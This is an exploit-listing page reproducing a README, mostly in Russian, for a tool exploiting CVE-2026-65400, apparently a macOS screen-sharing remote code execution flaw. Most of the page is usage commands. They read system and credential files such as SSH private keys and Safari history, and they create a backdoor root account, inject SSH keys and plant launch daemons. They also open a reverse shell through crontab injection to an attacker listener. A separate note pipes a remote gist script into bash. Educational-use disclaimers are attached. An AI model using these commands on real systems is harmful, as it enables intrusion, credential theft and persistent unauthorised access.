Sploitus

Exploit for CVE-2026-65400 CVE-2025-46822 CVE-2026-65400

kitploit · 2026-08-25

Exploit Code

MARKDOWN225 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HORKIMHAB-CVE-2026-65400
# CVE-2026-65400

## Пожертвовать

Поддержите сопровождение этого проекта через PayPal или отсканировав QR-код ниже.

![paypal](https://assets.kitploit.com/production/public/readmes/50451/ee1c4cfd1b1818743cf6930452dee0e56aa4709359e06ded6052d1e7abb14474.gif)

![QR-код для пожертвования](https://assets.kitploit.com/production/public/readmes/50451/8547a914397adeef146bb206525c92eb7da797a813c32cfb688d89348a337974.jpg)

## ⚡ Простое использование

Используйте этот проект только в безопасных и авторизованных средах, таких как:

  * Локальные виртуальные машины
  * Контейнеры Docker
  * Изолированные лабораторные среды
  * Авторизованные среды тестирования на проникновение



Пример настройки:

root@kitploit:~
    
    
    git clone <repository-url>
    cd <repository-name>
    
    # Project use python follow below
    
    # Create a virtual environment
    python -m venv venv
    
    # Activate the virtual environment
    
    # macOS / Linux
    source venv/bin/activate
    
    # Windows (Git Bash / WSL)
    source venv/Scripts/activate
    
    # Install requirments
    pip install -r requirements.txt
    
    

Пример использования:

root@kitploit:~
    
    
    # Read a File from Target
    
    # Read /etc/passwd and display it
    python3 exploit.py read -u root 192.168.1.100 /etc/passwd
    
    # Read and save to a local file
    python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt
    
    # Read a user's file
    python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt
    
    # Write a File to Target
    
    # Write a local file to target
    python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt
    
    # Write with specific permissions (0600 for crontab)
    python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600
    
    # Write from stdin
    echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -
    
    # Get a Reverse Shell (SIP Disabled Only)
    
    # On your attacker machine, start a listener in another terminal
    nc -nlvp 4444
    
    # Run the exploit
    python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
    # Where:
    #   192.168.1.100 = target Mac IP
    #   192.168.1.50  = your attacker IP
    #   4444          = port for reverse shell
    
    # Example 1: Reading System Files
    # Read the shadow file (if accessible)
    python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist
    
    # Read Safari history
    python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db
    
    # Read SSH keys (if they exist)
    python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa
    
    # Example 2: Writing Files
    
    # Create a backdoor user
    echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
    python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt
    
    # Inject SSH key
    python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub
    
    # Write a startup script
    python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist
    
    # Example 3: SIP Detection
    
    python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
    
    # Output if SIP is enabled:
    # [!] SIP is enabled - crontab injection will fail
    # [!] Try using the read/write commands instead
    
    # Output if SIP is disabled:
    # [*] SIP is disabled - proceeding with RCE
    # [+] Wrote shell script to /var/tmp/.r
    # [+] Wrote crontab to /var/at/tabs/root
    # [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds
    
    # Authentication Bypass Retry
    # Increase retry count if it fails
    python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50
    
    # Port Specification
    
    python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901
    

Примечание:

  * при клонировании из другого проекта вы должны выполнить `curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y`, чтобы удалить вложенный каталог .git
  * например: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...



* * *

## Авторство и ссылки

  * https://warez.sl0p.foo/apple-screensharing-rce/
  * https://blog.calif.io/p/no-country-for-old-passwords



* * *

# 📚 Образовательный репозиторий по исследованию безопасности

Репозиторий для изучения, тестирования и исследования концепций кибербезопасности в контролируемых средах.

* * *

## ⚠️ Отказ от ответственности и правовая информация

## Цель

Этот репозиторий предназначен **только для образовательных целей и авторизованных исследований в области безопасности**.

Он создан, чтобы помочь пользователям изучить:

  * Уязвимости безопасности
  * Концепции песочницы и изоляции
  * Безопасное программирование и методы защиты



* * *

## Только авторизованное использование

Используйте этот репозиторий только в средах, где у вас есть разрешение, например:

  * Личные лаборатории или виртуальные машины
  * Docker или изолированные среды
  * Авторизованное тестирование на проникновение
  * Обучение кибербезопасности или академические исследования



Неавторизованное или незаконное использование строго запрещено.

* * *

## Отсутствие ответственности

Автор и участники **не несут ответственности** за любой ущерб, неправомерное использование, юридические проблемы или убытки, вызванные этим проектом.

Используя этот репозиторий, вы соглашаетесь с тем, что:

  * Вы несёте ответственность за свои действия
  * Вы будете использовать его законно и этично
  * Проект предоставляется **без каких-либо гарантий**



* * *

## Этичное использование

Этот проект предназначен для:

  * Исследований в области защитной безопасности
  * Образования в области кибербезопасности
  * Повышения осведомлённости об уязвимостях
  * Исследований безопасных систем и программного обеспечения



Пожалуйста, соблюдайте практики ответственного раскрытия информации и действуйте в соответствии со всеми применимыми законами.

* * *

## Контакты

Для ответственного раскрытия информации или сотрудничества свяжитесь с сопровождающим репозитория через GitHub.

* * *

## Связанный проект

Ознакомьтесь с PoC CVE Collection для получения дополнительных PoC-ресурсов по CVE, предназначенных для авторизованных исследований в области безопасности и образования.